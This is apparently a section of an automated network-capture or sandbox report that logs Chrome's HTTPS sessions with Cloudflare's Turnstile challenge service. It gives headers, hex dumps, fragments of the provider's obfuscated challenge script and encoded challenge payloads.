69 29 7b 72 65 74 75 72
                                                                              Data Ascii: n(h,i){return h==i},'ODSbh':function(h,i){return h(i)},'yNqDY':function(h,i){return h*i},'ROATj':function(h,i){return h<i},'MipnB':function(h,i){return h(i)},'ECSCZ':function(h,i){return i!=h},'DkpWz':function(h,i){return h(i)},'OOWTj':function(h,i){retur
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 62 6a 65 63 74 5b 6a 6f 28 31 33 33 33 29 5d 5b 6a 6f 28 31 37 38 34 29 5d 5b 6a 6f 28 35 39 38 29 5d 28 43 2c 44 29 29 7b 69 66 28 32 35 36 3e 44 5b 6a 6f 28 36 39 30 29 5d 28 30 29 29 7b 66 6f 72 28 78 3d 30 3b 78 3c 47 3b 49 3c 3c 3d 31 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 6a 6f 28 37 33 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 6a 6f 28 36 39 30 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 6a 6f 28 34 38 34 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 6a 6f 28 38 34 37 29 5d 28 49 2c 31 29 7c 4e 26 31 2e 31 32 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 6a 6f 28 37 33 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30
                                                                              Data Ascii: bject[jo(1333)][jo(1784)][jo(598)](C,D)){if(256>D[jo(690)](0)){for(x=0;x<G;I<<=1,j-1==J?(J=0,H[jo(738)](o(I)),I=0):J++,x++);for(N=D[jo(690)](0),x=0;d[jo(484)](8,x);I=d[jo(847)](I,1)|N&1.12,J==j-1?(J=0,H[jo(738)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 6a 6f 28 35 38 34 29 5d 28 30 2c 45 29 26 26 28 45 3d 4d 61 74 68 5b 6a 6f 28 34 38 38 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 4e 28 64 5b 6a 6f 28 34 37 35 29 5d 29 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 6a 6f 28 31 30 32 39 29 5d 28 64 5b 6a 6f 28 31 36 35 38 29 5d 28 49 2c 31 29 2c 4e 26 31 29 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 6a 6f 28 37 33 38 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 45 2d 2d 2c 30 3d 3d 45 26 26 47 2b 2b 7d 66 6f 72 28 4e 3d 32 2c 78 3d 30 3b 78 3c 47 3b 49 3d 31 26 4e 7c 49 3c 3c 31 2e 33 31 2c 64 5b 6a 6f 28 31 36 34 35 29
                                                                              Data Ascii: ,N>>=1,x++);}E--,d[jo(584)](0,E)&&(E=Math[jo(488)](2,G),G++),delete C[D]}else N(d[jo(475)])}else for(N=B[D],x=0;x<G;I=d[jo(1029)](d[jo(1658)](I,1),N&1),J==j-1?(J=0,H[jo(738)](o(I)),I=0):J++,N>>=1,x++);E--,0==E&&G++}for(N=2,x=0;x<G;I=1&N|I<<1.31,d[jo(1645)
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 37 30 30 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 6a 74 28 34 36 32 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 6a 74 28 31 36 31 32 29 5d 28 64 5b 6a 74 28 31 35 30 35 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 6a 74 28 31 32 34 38 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 74 28 34 38 38 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 64 5b 6a 74 28 39 37 34 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 6a 74 28 35 38 34 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 6a 74 28 31 38 31 39 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4e 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 6a 74 28 31 32 34
                                                                              Data Ascii: 700)](0,H)&&(H=j,G=d[jt(462)](o,I++)),J|=d[jt(1612)](d[jt(1505)](0,N)?1:0,F),F<<=1);O=d[jt(1248)](e,J);break;case 1:for(J=0,K=Math[jt(488)](2,16),F=1;K!=F;N=d[jt(974)](G,H),H>>=1,d[jt(584)](0,H)&&(H=j,G=d[jt(1819)](o,I++)),J|=F*(0<N?1:0),F<<=1);O=d[jt(124


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.449801104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:16:05 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/222733666:1727915423:5-v15oC4VIYDeSwiN5Q89PsCmAt4Sv9Px2N-w3JWz38/8cc915a7fc91c407/a2be53c464a6597 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 2798
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: a2be53c464a6597
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:16:05 UTC2798OUTData Raw: 76 5f 38 63 63 39 31 35 61 37 66 63 39 31 63 34 30 37 3d 45 46 65 43 52 43 57 43 46 43 31 43 41 24 39 42 24 39 73 43 24 62 68 44 54 55 24 36 39 54 39 76 7a 62 78 4c 4d 39 4e 25 32 62 72 39 4d 4d 24 34 39 6d 39 49 62 36 44 71 4d 39 6c 39 45 43 78 44 46 4f 37 35 39 53 43 78 2b 39 70 47 61 49 70 4d 39 68 4d 39 37 6c 39 2b 49 4c 71 39 6e 43 51 7a 39 6b 43 54 79 34 69 57 44 75 34 43 58 39 45 4d 68 37 30 70 44 43 24 69 7a 43 54 4d 39 4f 49 44 35 6b 6c 39 67 2b 73 6b 4c 63 78 39 45 65 2b 65 39 69 4d 6e 49 78 71 4d 6c 36 73 6b 52 76 69 4b 53 68 48 4b 53 53 43 51 39 67 6d 71 39 44 4d 44 2b 37 62 51 39 24 67 4d 39 79 73 76 39 2b 7a 46 71 34 39 39 52 39 78 6b 4f 54 24 7a 4e 49 6d 4d 35 39 54 4c 39 45 62 39 49 78 62 39 64 6e 4c 76 39 6b 4d 39 72 6e 43 39 4b 77 58 64
                                                                              Data Ascii: v_8cc915a7fc91c407=EFeCRCWCFC1CA$9B$9sC$bhDTU$69T9vzbxLM9N%2br9MM$49m9Ib6DqM9l9ECxDFO759SCx+9pGaIpM9hM97l9+ILq9nCQz9kCTy4iWDu4CX9EMh70pDC$izCTM9OID5kl9g+skLcx9Ee+e9iMnIxqMl6skRviKShHKSSCQ9gmq9DMD+7bQ9$gM9ysv9+zFq499R9xkOT$zNImM59TL9Eb9Ixb9dnLv9kM9rnC9KwXd
                                                                              2024-10-03 01:16:05 UTC717INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:16:05 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 152236
                                                                              Connection: close
                                                                              cf-chl-gen: 71xsUqt4CHB8M+7AOD/oBbrkDq9ThN9V6b//VHdB6Ilbwn407CCZ/mUWlzByqV3PUrpFNS9DsAw6CrvVOTkpvhFjJ78vZwXxUk9B2AnZ6tMyfBPbuYI4HygJHiyYdmOskrzbltGk/Dth9tS4/bcYdyASaXPejvTfrt7Vea9SsEnp1ZQ2Mi5b9tL3XV0A1Vwg2l0J8K0cFHI21REG5fX72e72SZTuy//1AT550HPVxm+jeudqM5+H/DYA3Zb/YI2WOvPOq5FyPqc3AXIAm996PyBSDH8/MUk47DAKdt20GXeWC4s2We/tMCm5CWH6dbO4+dBXuAQwaJ5B1VhVMY/2sWZjXVuTNnq+lt0M4JxVgs0QdLgnf8k7j5DNVnW0Pdg/YY5myI6sD+lMe5+i9UABYWymk/wySxg88822ctfqrhct+YeP3RG/eGkf78pXWmhsQ2ycfAFZQCG50Jefj0GjzUZwp5vuEtA9CDLkpSarA16R6m4=$0TG6/UMF1h5K+orZ
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc915b3e84d8c69-EWR
                                                                              2024-10-03 01:16:05 UTC652INData Raw: 67 36 32 4c 68 34 79 74 76 70 71 4e 77 35 79 33 6d 70 71 51 77 4a 2b 6d 71 4d 75 65 77 36 43 76 79 36 36 6d 79 38 79 54 74 73 48 4d 72 4e 6a 4f 30 61 36 62 71 63 44 42 33 36 54 57 32 35 2b 39 79 39 71 65 33 63 54 66 34 72 48 47 76 38 33 42 31 50 4c 43 79 74 76 75 75 50 72 6e 79 2b 47 36 39 67 50 57 75 77 54 61 78 63 63 4a 33 67 72 56 44 76 67 52 45 51 37 6c 41 77 51 54 41 65 6f 4b 46 42 51 61 47 52 34 57 2f 4f 76 39 41 79 41 54 42 78 30 6b 46 77 7a 35 48 4f 73 58 35 6a 41 4b 46 41 73 57 4e 50 50 32 38 68 76 7a 45 66 59 66 39 7a 73 59 4c 44 42 42 46 45 51 6c 46 78 30 59 4a 41 55 48 43 54 41 74 43 7a 4a 43 4c 53 73 6d 43 52 45 32 51 6a 63 35 4c 6a 30 38 4c 53 38 7a 50 6b 42 6b 57 6b 4a 53 57 6d 70 57 61 47 56 6f 53 56 68 67 58 7a 4e 6d 63 57 64 70 63 79 39
                                                                              Data Ascii: g62Lh4ytvpqNw5y3mpqQwJ+mqMuew6Cvy66my8yTtsHMrNjO0a6bqcDB36TW25+9y9qe3cTf4rHGv83B1PLCytvuuPrny+G69gPWuwTaxccJ3grVDvgREQ7lAwQTAeoKFBQaGR4W/Ov9AyATBx0kFwz5HOsX5jAKFAsWNPP28hvzEfYf9zsYLDBBFEQlFx0YJAUHCTAtCzJCLSsmCRE2Qjc5Lj08LS8zPkBkWkJSWmpWaGVoSVhgXzNmcWdpcy9
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 65 33 57 45 70 4a 65 43 68 4a 35 6a 6e 59 6d 4d 63 59 61 69 61 6f 32 33 6a 61 36 46 6a 59 79 6f 68 5a 75 57 6e 4a 47 4c 73 62 4b 69 76 62 69 6f 76 6e 79 46 68 5a 7a 4a 6a 49 75 4b 73 39 54 51 79 39 66 57 6c 74 69 36 78 73 6e 58 78 36 2f 54 6e 39 33 69 73 4c 2b 2f 77 74 4f 6a 71 73 44 48 34 4e 71 35 30 4c 6d 71 78 4d 62 47 37 4d 50 41 79 74 54 57 72 73 7a 55 75 75 48 35 33 50 62 43 2b 72 6a 6c 34 50 4c 61 42 4e 66 39 31 76 6a 62 37 41 38 47 34 4f 72 70 30 39 67 4d 42 67 38 61 32 78 77 42 39 42 51 4f 46 79 50 34 4a 41 6e 37 34 42 59 66 4b 79 63 73 45 51 63 4f 48 69 63 30 43 54 51 5a 44 2f 41 6d 4c 7a 77 33 50 43 45 57 48 69 34 33 52 54 39 45 4b 53 45 6f 4f 69 6c 47 44 67 30 59 4c 7a 6f 4c 55 68 38 7a 46 6a 63 57 56 42 63 74 4f 42 59 2b 4b 78 6b 77 50 6a 45
                                                                              Data Ascii: e3WEpJeChJ5jnYmMcYaiao23ja6FjYyohZuWnJGLsbKivbiovnyFhZzJjIuKs9TQy9fWlti6xsnXx6/Tn93isL+/wtOjqsDH4Nq50LmqxMbG7MPAytTWrszUuuH53PbC+rjl4PLaBNf91vjb7A8G4Orp09gMBg8a2xwB9BQOFyP4JAn74BYfKycsEQcOHic0CTQZD/AmLzw3PCEWHi43RT9EKSEoOilGDg0YLzoLUh8zFjcWVBctOBY+KxkwPjE
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 6e 64 33 5a 61 75 45 6a 47 6c 71 69 33 36 6a 63 48 69 7a 69 49 2b 79 6d 70 69 70 75 36 36 38 6f 35 57 6a 77 35 62 44 74 73 53 6e 6e 61 76 4b 30 49 6e 42 7a 4a 7a 47 6f 36 69 56 73 35 62 51 74 71 54 47 30 39 69 71 75 5a 2b 7a 6d 37 48 48 77 4a 72 6f 34 61 6a 5a 35 4f 2b 6c 30 64 76 6a 35 63 48 4d 35 4e 2f 6e 39 38 72 30 78 4d 72 56 36 65 76 30 41 73 44 6c 35 64 38 47 33 4f 6a 56 37 4c 37 4b 36 63 59 47 2b 74 41 4a 45 52 4c 72 44 4d 72 68 42 4e 72 53 30 77 76 66 31 74 66 64 38 4e 59 6a 49 42 55 58 34 79 62 31 2f 53 7a 6c 4b 41 4d 78 4b 42 34 43 41 65 34 54 4d 79 50 30 46 78 45 4a 39 68 73 36 41 50 77 66 47 42 48 2b 49 30 6e 37 48 53 63 35 4b 45 41 69 4c 52 41 2f 56 43 38 49 53 7a 46 61 4c 6c 6f 76 4f 44 34 52 4d 53 78 64 57 53 49 64 4f 46 56 49 4b 45 4e 69
                                                                              Data Ascii: nd3ZauEjGlqi36jcHiziI+ympipu668o5Wjw5bDtsSnnavK0InBzJzGo6iVs5bQtqTG09iquZ+zm7HHwJro4ajZ5O+l0dvj5cHM5N/n98r0xMrV6ev0AsDl5d8G3OjV7L7K6cYG+tAJERLrDMrhBNrS0wvf1tfd8NYjIBUX4yb1/SzlKAMxKB4CAe4TMyP0FxEJ9hs6APwfGBH+I0n7HSc5KEAiLRA/VC8ISzFaLlovOD4RMSxdWSIdOFVIKENi
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 4e 79 6b 48 2b 48 68 58 4f 50 6c 59 65 64 68 59 65 39 66 61 2b 72 74 49 4b 79 67 5a 57 39 78 4c 4f 45 74 73 66 50 75 49 71 6d 30 37 79 4f 30 61 48 47 6b 64 53 35 79 4a 65 79 76 62 62 55 79 35 6a 4d 6e 65 47 78 78 4b 48 6c 75 63 43 6e 77 73 33 59 71 65 37 74 35 64 57 2b 77 72 50 4e 37 4b 7a 44 74 37 33 38 38 76 37 39 2f 4d 32 2f 37 2f 66 6b 42 2b 41 43 44 63 63 42 36 51 6a 37 41 67 77 56 41 42 45 56 34 64 66 75 46 4e 6e 61 37 78 77 64 49 68 7a 55 47 69 44 36 2b 51 6a 67 34 41 67 6f 4b 66 73 43 49 67 67 65 47 77 34 46 4c 6a 63 31 4e 79 4d 46 46 44 77 6f 4e 41 6c 42 41 42 46 43 46 43 46 44 4b 54 77 71 52 53 63 6d 52 78 77 50 55 6b 38 52 4a 79 70 52 49 79 4e 45 54 31 6b 59 4b 55 77 65 4e 6a 42 50 56 6c 38 68 50 43 56 58 4a 46 56 47 57 32 31 59 4f 32 38 6f 4b
                                                                              Data Ascii: NykH+HhXOPlYedhYe9fa+rtIKygZW9xLOEtsfPuIqm07yO0aHGkdS5yJeyvbbUy5jMneGxxKHlucCnws3Yqe7t5dW+wrPN7KzDt7388v79/M2/7/fkB+ACDccB6Qj7AgwVABEV4dfuFNna7xwdIhzUGiD6+Qjg4AgoKfsCIggeGw4FLjc1NyMFFDwoNAlBABFCFCFDKTwqRScmRxwPUk8RJypRIyNET1kYKUweNjBPVl8hPCVXJFVGW21YO28oK
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 4b 65 58 4f 4b 76 62 47 4b 6b 4c 47 66 77 37 53 63 6c 38 61 45 73 73 71 30 6f 63 58 4f 69 4b 32 79 70 36 36 6b 74 61 48 53 32 63 79 55 6c 61 57 54 6d 61 79 57 74 36 47 32 32 4d 2f 51 36 4b 43 39 70 39 4f 65 71 4e 62 75 72 74 44 6a 35 71 37 53 7a 62 50 41 31 2f 6d 35 79 65 58 79 33 76 49 41 37 4e 37 74 41 77 4c 32 34 38 41 4b 79 2b 30 42 37 67 62 72 2b 63 6e 54 43 51 30 50 42 41 76 76 46 4f 37 32 42 68 76 33 41 4f 33 68 32 69 59 6a 48 39 2f 38 2f 66 34 66 39 43 7a 72 2f 54 45 61 44 41 67 6a 35 77 49 77 42 69 38 57 46 6a 58 39 44 42 38 4c 49 42 49 62 4d 77 55 41 4f 66 34 67 42 52 63 48 48 69 6b 75 51 6a 34 50 4d 69 38 2f 4a 68 52 57 4f 6b 77 63 4c 6a 55 65 47 32 42 67 47 7a 4d 78 51 53 4a 56 4e 79 4a 68 57 79 55 37 4f 30 45 70 58 58 52 55 4c 6c 35 54 64 48
                                                                              Data Ascii: KeXOKvbGKkLGfw7Scl8aEssq0ocXOiK2yp66ktaHS2cyUlaWTmayWt6G22M/Q6KC9p9OeqNburtDj5q7SzbPA1/m5yeXy3vIA7N7tAwL248AKy+0B7gbr+cnTCQ0PBAvvFO72Bhv3AO3h2iYjH9/8/f4f9Czr/TEaDAgj5wIwBi8WFjX9DB8LIBIbMwUAOf4gBRcHHikuQj4PMi8/JhRWOkwcLjUeG2BgGzMxQSJVNyJhWyU7O0EpXXRULl5TdH
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 6d 48 71 4e 6c 36 4f 59 75 63 61 70 78 35 32 65 68 49 72 49 69 62 32 5a 78 4c 44 41 73 4d 37 54 75 4a 57 79 31 4e 61 63 74 61 76 65 74 64 50 42 7a 37 53 79 73 4c 4c 56 35 36 72 46 71 4e 66 77 33 4d 50 78 78 71 2f 77 78 61 37 35 38 39 54 53 38 2b 57 37 38 39 76 74 38 66 37 77 32 77 54 67 30 2f 54 37 2f 51 59 50 78 65 4c 43 43 65 72 46 30 2f 58 78 43 74 44 79 39 76 4d 56 33 52 41 54 38 69 41 67 32 2f 72 6c 49 42 76 36 4b 43 44 6a 41 2b 30 67 49 77 4d 77 49 4f 73 4c 39 52 49 72 43 2b 38 52 4a 50 6e 30 44 42 67 52 50 7a 30 62 4c 55 45 65 45 66 6f 33 48 78 55 61 52 42 6f 4c 49 45 64 49 4c 79 6c 4a 4a 79 59 71 4b 6b 64 48 53 79 64 65 48 31 63 35 47 6c 45 74 4e 79 55 36 53 6a 5a 6e 59 31 73 34 58 32 35 50 50 54 39 64 4e 45 64 77 5a 46 4d 79 4f 6b 6c 4e 58 6c 6f
                                                                              Data Ascii: mHqNl6OYucapx52ehIrIib2ZxLDAsM7TuJWy1NactavetdPBz7SysLLV56rFqNfw3MPxxq/wxa7589TS8+W789vt8f7w2wTg0/T7/QYPxeLCCerF0/XxCtDy9vMV3RAT8iAg2/rlIBv6KCDjA+0gIwMwIOsL9RIrC+8RJPn0DBgRPz0bLUEeEfo3HxUaRBoLIEdILylJJyYqKkdHSydeH1c5GlEtNyU6SjZnY1s4X25PPT9dNEdwZFMyOklNXlo
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 62 50 48 67 63 71 46 70 70 36 73 76 63 65 4e 77 73 44 4d 76 63 4b 2f 7a 72 71 31 31 63 61 38 74 73 43 6f 7a 36 2f 66 6f 4c 72 42 76 4b 44 6a 6f 4e 57 6c 77 65 61 6d 36 74 33 73 38 62 79 30 79 38 57 76 75 4f 37 55 39 50 66 48 30 73 44 79 77 4e 6a 74 2b 73 4d 47 42 2f 34 4d 39 66 54 6b 33 74 6e 4c 35 76 4c 65 30 50 37 78 79 52 72 52 46 4e 45 63 46 74 58 6f 44 77 30 4e 47 41 48 32 33 68 73 59 43 51 6b 72 48 2b 63 5a 4b 53 59 7a 45 41 45 47 4e 51 51 45 43 53 38 51 44 66 6f 4e 4e 43 6f 34 4f 50 33 36 51 42 41 61 49 78 30 41 43 51 4d 5a 49 53 45 4b 53 69 63 75 4c 6b 73 67 54 53 4e 46 54 53 78 45 4e 52 41 6e 59 56 34 72 58 54 6b 35 56 54 41 6a 4f 56 70 4d 5a 79 4d 32 54 45 68 52 54 30 64 6a 4b 79 35 66 54 46 6c 6f 62 44 67 34 53 7a 78 32 58 48 31 62 66 34 52 5a
                                                                              Data Ascii: bPHgcqFpp6svceNwsDMvcK/zrq11ca8tsCoz6/foLrBvKDjoNWlweam6t3s8by0y8WvuO7U9PfH0sDywNjt+sMGB/4M9fTk3tnL5vLe0P7xyRrRFNEcFtXoDw0NGAH23hsYCQkrH+cZKSYzEAEGNQQECS8QDfoNNCo4OP36QBAaIx0ACQMZISEKSicuLksgTSNFTSxENRAnYV4rXTk5VTAjOVpMZyM2TEhRT0djKy5fTFlobDg4Szx2XH1bf4RZ
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 69 6c 6a 49 6a 4c 76 37 36 72 76 59 33 4d 73 72 54 55 74 4c 43 6f 79 63 32 75 34 65 50 66 78 62 72 5a 30 36 6a 58 75 38 4c 4c 33 73 48 50 38 4f 2f 74 71 62 4c 67 35 50 47 78 74 2f 76 37 75 64 66 65 32 2f 76 37 33 74 37 77 33 2f 76 36 31 2f 58 6a 78 50 76 35 32 76 76 64 44 68 48 64 42 67 76 78 37 51 6f 5a 41 78 50 57 36 51 77 4d 48 65 2f 65 46 77 51 51 47 2f 41 56 2b 2b 63 46 46 52 7a 33 49 41 30 54 42 42 34 52 2f 69 59 70 39 42 6b 34 2b 69 77 70 4d 41 30 7a 4c 6a 6f 77 41 43 49 48 4d 52 38 4a 51 42 52 48 41 43 64 52 49 77 73 75 51 6a 52 55 4d 79 46 4d 4f 69 6f 6c 4d 55 5a 62 54 46 56 44 48 42 39 68 59 6a 5a 47 52 31 56 6d 49 6a 35 68 51 6d 42 61 61 45 52 49 59 69 39 6e 53 57 68 57 65 30 5a 50 66 44 6b 39 55 6e 5a 42 58 45 4e 53 58 33 43 46 58 6d 5a 55 66
                                                                              Data Ascii: iljIjLv76rvY3MsrTUtLCoyc2u4ePfxbrZ06jXu8LL3sHP8O/tqbLg5PGxt/v7udfe2/v73t7w3/v61/XjxPv52vvdDhHdBgvx7QoZAxPW6QwMHe/eFwQQG/AV++cFFRz3IA0TBB4R/iYp9Bk4+iwpMA0zLjowACIHMR8JQBRHACdRIwsuQjRUMyFMOiolMUZbTFVDHB9hYjZGR1VmIj5hQmBaaERIYi9nSWhWe0ZPfDk9UnZBXENSX3CFXmZUf
                                                                              2024-10-03 01:16:05 UTC1369INData Raw: 2f 30 61 47 72 30 70 4b 70 74 64 53 64 71 37 76 67 74 4e 6d 76 31 62 66 53 77 2b 43 6c 70 39 76 69 79 38 53 71 77 61 33 4b 73 73 33 6d 78 76 6a 53 31 38 58 50 32 39 44 59 79 4d 34 42 34 2b 76 7a 76 73 58 6a 34 50 7a 53 79 65 6e 4a 39 73 38 50 44 76 45 51 36 4f 66 56 36 2b 67 55 38 76 4d 49 42 2f 33 79 39 2b 77 6a 48 77 50 7a 4a 51 50 7a 46 53 77 44 4a 77 6e 6c 41 2b 62 74 38 75 76 2b 43 44 67 6a 43 44 45 78 2b 68 41 34 2b 43 34 7a 39 78 63 43 50 41 59 76 4e 78 49 62 50 69 30 4b 4c 53 51 6c 4d 41 30 77 52 6a 56 58 4c 77 6f 69 46 43 59 33 57 6b 77 64 4c 44 68 52 48 79 49 75 50 44 4e 68 55 6c 64 58 5a 54 77 73 54 6a 31 75 52 6c 38 6d 62 6d 42 73 59 58 52 72 57 6d 38 32 55 6b 70 65 58 45 71 43 65 55 42 36 4f 55 4e 64 61 34 74 39 5a 33 39 48 67 5a 4b 51 5a 70
                                                                              Data Ascii: /0aGr0pKptdSdq7vgtNmv1bfSw+Clp9viy8Sqwa3Kss3mxvjS18XP29DYyM4B4+vzvsXj4PzSyenJ9s8PDvEQ6OfV6+gU8vMIB/3y9+wjHwPzJQPzFSwDJwnlA+bt8uv+CDgjCDEx+hA4+C4z9xcCPAYvNxIbPi0KLSQlMA0wRjVXLwoiFCY3WkwdLDhRHyIuPDNhUldXZTwsTj1uRl8mbmBsYXRrWm82UkpeXEqCeUB6OUNda4t9Z39HgZKQZp


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.449802104.18.95.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:16:06 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/222733666:1727915423:5-v15oC4VIYDeSwiN5Q89PsCmAt4Sv9Px2N-w3JWz38/8cc915a7fc91c407/a2be53c464a6597 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:16:06 UTC349INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 03 Oct 2024 01:16:06 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: uijAihZTOxgxEryTAx6n4xLjJ9rQ9AgMCdw=$x7s8tBQoudpjsTE4
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc915bb8b09191e-EWR
                                                                              2024-10-03 01:16:06 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.449803104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:16:06 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cc915a7fc91c407/1727918165136/fe0f65985a4087ca86d273a2bf66cec51684f85e32960c17d0e1dc96ecaa931b/uGLBjHaOpVOp1J0 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:16:06 UTC143INHTTP/1.1 401 Unauthorized
                                                                              Date: Thu, 03 Oct 2024 01:16:06 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              2024-10-03 01:16:06 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 5f 67 39 6c 6d 46 70 41 68 38 71 47 30 6e 4f 69 76 32 62 4f 78 52 61 45 2d 46 34 79 6c 67 77 58 30 4f 48 63 6c 75 79 71 6b 78 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
